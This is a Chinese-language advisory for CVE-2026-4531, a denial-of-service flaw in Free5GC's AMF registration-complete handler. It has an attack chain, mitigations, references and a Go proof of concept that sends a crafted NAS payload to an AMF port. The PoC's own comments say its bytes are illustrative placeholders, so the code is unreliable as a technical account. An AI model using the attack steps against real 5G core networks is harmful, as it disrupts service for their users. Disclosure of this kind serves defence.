CVE-2026-4531 Free5GC拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-4531

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Free5GC

漏洞概述

Free5GC版本4.1.0中存在一个安全漏洞，主要影响AMF组件中的`internal/gmm/handler.go`文件的`HandleRegistrationComplete`函数。由于该函数在处理特定输入时存在缺陷，未经身份验证的远程攻击者可以通过发送恶意的操纵数据触发该漏洞。成功利用此漏洞可导致目标系统出现拒绝服务状态，从而中断5G核心网的正常运行。目前官方已发布修复补丁，建议用户尽快更新。

技术细节

该漏洞位于Free5GC项目的接入和移动性管理功能（AMF）模块中，具体涉及GMM（GPRS移动性管理）层的注册完成处理逻辑。在`HandleRegistrationComplete`函数中，程序未能正确处理或验证某些边缘情况下的注册请求消息。攻击者可以通过网络向AMF节点发送特制的NAS（非接入层）消息，利用该逻辑缺陷触发异常。由于CVSS向量显示攻击复杂度低（AC:L）、无需权限（PR:N）且无需用户交互（UI:N），攻击者可以轻易地从远程发起攻击。这可能导致AMF进程崩溃或资源耗尽，进而导致无法处理新用户的注册请求或连接管理，严重影响网络的可用性。修复该问题的补丁提交ID为52e9386401ce56ea773c5aa587d4cdf7d53da799。

攻击链分析

STEP 1

侦察

攻击者扫描互联网以寻找暴露的Free5GC AMF服务接口（通常是N2接口或NAS接口）。

STEP 2

构造恶意数据

攻击者根据漏洞细节，构造一个特制的NAS注册完成消息，其中包含能够触发HandleRegistrationComplete函数逻辑错误的特定数据字段。

STEP 3

发起攻击

攻击者通过网络将恶意数据包发送给目标AMF组件，无需身份验证即可触发处理流程。

STEP 4

达成拒绝服务

AMF在解析恶意数据时发生崩溃或进入异常状态，导致无法处理正常的5G终端注册和业务请求，服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Concept for CVE-2026-4531
 * This script demonstrates a conceptual DoS attack against Free5GC AMF.
 * It sends a crafted malformed Registration Complete message.
 */

package main

import (
	"fmt"
	"net"
)

func main() {
	// Target AMF interface (Example IP and Port)
	target := "127.0.0.1:38412"

	// Establish a connection to the AMF
	conn, err := net.Dial("tcp", target)
	if err != nil {
		fmt.Printf("[-] Failed to connect to target: %v\n", err)
		return
	}
	defer conn.Close()

	fmt.Println("[+] Connected to AMF")

	// Crafted malicious payload triggering the weakness in HandleRegistrationComplete
	// Note: The actual byte sequence requires reversing the specific patch or binary analysis.
	// This represents the trigger mechanism.
	maliciousPayload := []byte{
		0x1e, 0x00, 0x20, 0x00, // NAS Message Header Example
		0x05, 0x01, // Malformed Security Header type
		0xFF, 0xFF, 0xFF, 0xFF, // Trigger data causing panic in handler.go
	}

	// Send payload
	_, err = conn.Write(maliciousPayload)
	if err != nil {
		fmt.Printf("[-] Failed to send payload: %v\n", err)
		return
	}

	fmt.Println("[!] Malicious payload sent. Check AMF status for DoS condition.")
}

影响范围

Free5GC 4.1.0

防御指南

临时缓解措施

如果无法立即升级，建议在防火墙或ACL中限制对AMF组件端口的访问来源，仅允许可信的基站（gNodeB）IP地址连接。同时，加强对AMF服务进程的监控，一旦检测到崩溃或异常重启，立即发出警报并进行人工干预。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4531
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4531
3 Details https://www.cvedetails.com/cve/CVE-2026-4531/
4 VulDB https://vuldb.com/cve/CVE-2026-4531
5 Link https://github.com/free5gc/amf/commit/52e9386401ce56ea773c5aa587d4cdf7d53da799
6 Link https://github.com/free5gc/amf/pull/198
7 Link https://github.com/free5gc/free5gc/
8 Link https://github.com/free5gc/free5gc/issues/792
9 Link https://vuldb.com/?ctiid.352319
10 Link https://vuldb.com/?id.352319
11 Link https://vuldb.com/?submit.774073
12 Link https://github.com/free5gc/free5gc/issues/792